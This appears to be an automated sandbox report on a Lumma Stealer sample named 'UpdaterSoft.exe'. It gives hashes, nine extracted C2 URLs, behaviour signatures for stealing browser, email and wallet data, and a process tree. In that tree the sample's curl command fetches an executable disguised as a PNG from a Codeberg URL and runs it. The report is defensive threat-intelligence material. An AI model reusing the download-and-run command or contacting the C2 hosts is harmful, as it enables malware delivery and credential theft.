Analysis

  • max time kernel
    148s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-12-2024 03:35

General

  • Target

    UpdaterSoft.exe

  • Size

    100KB

  • MD5

    cd2b6c28a8690c90953625c38ad21c05

  • SHA1

    cc9f6d12be5f2ee6001af0a6d7399619bb2ea721

  • SHA256

    1ecd4b2fc4c5ba45e58005df147b1f8cf51db8fabe1be76fb2ece1e55d42c4ff

  • SHA512

    8c54b0e9baba8be6105072e36aa2b02672a29c5ed138c5de306a55468c2ead66afe786a88719e0404cada45e1bbf0cf4f4ca24acb98f84b99ded31a09b9f8152

  • SSDEEP

    1536:kE/hIxHHWMpdPa5wiE21M8kJIGFvb1CwL/L5syuyUzR9aBfI+v3GVm:3SwMpdCq/IM8uIGfh/L5sNFVm

Malware Config

Extracted

Family

lumma

C2

https://sordid-snaked.cyou/api

https://awake-weaves.cyou/api

https://wrathful-jammy.cyou/api

https://debonairnukk.xyz/api

https://diffuculttan.xyz/api

https://effecterectz.xyz/api

https://deafeninggeh.biz/api

https://immureprech.biz/api

https://ingreem-eilish.biz/api

Extracted

Family

lumma

C2

https://ingreem-eilish.biz/api

Signatures

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\UpdaterSoft.exe
    "C:\Users\Admin\AppData\Local\Temp\UpdaterSoft.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4552
    • C:\Windows\SysWOW64\curl.exe
      curl -o "C:\Users\Admin\AppData\Roaming\MicrosoftOpenBoard240647828.exe" "https://codeberg.org/whoachek/33333/raw/branch/main/1/vqafmixmmr.png" -H "User-Agent: Mozilla/5.0" -H "Accept: */*"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4908
    • C:\Users\Admin\AppData\Roaming\MicrosoftOpenBoard240647828.exe
      C:\Users\Admin\AppData\Roaming\MicrosoftOpenBoard240647828.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      PID:3348

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\MicrosoftOpenBoard240647828.exe

    Filesize

    1.9MB

    MD5

    f1c31db067049938dd0de6ebcecccbff

    SHA1

    95def6211ec6e9355fee6141dec60077e6ab2daf

    SHA256

    3f9a251541dd3516a0a75a3591733c3cd76207e09bc3ef9e7d0ae2b9d00b0288

    SHA512

    6c0aea6d5b20b17f02df92ca55a57499b1f1d27e7ba0f99c4ab39ffe9fa83de4a01b008cb78dd4ff0555848bf9ece56c989c4267bd4ccff3cd7b9d604701e3ea

  • C:\Users\Admin\AppData\Roaming\MicrosoftOpenBoard240647828.exe

    Filesize

    1.9MB

    MD5

    256a1ccec403335433630f6824e081df

    SHA1

    88abf0221a21e688971e4f746f802d86a86fe085

    SHA256

    f99595da2c8aca38f9749dc0b36d5203e2d51769db297aaa45bcb1eea27cec5d

    SHA512

    56bef26930b9c4d7e3e9388fc9abb916f012dc2a643927eb8047527ce337d39e99d76f5613722e4458959fd130d47e954992f3b106c81007d69e8c48203612e0

  • memory/3348-6-0x00000000023C0000-0x0000000002411000-memory.dmp

    Filesize

    324KB

  • memory/3348-8-0x00000000023C0000-0x0000000002411000-memory.dmp

    Filesize

    324KB

  • memory/3348-11-0x0000000000500000-0x0000000000705000-memory.dmp

    Filesize

    2.0MB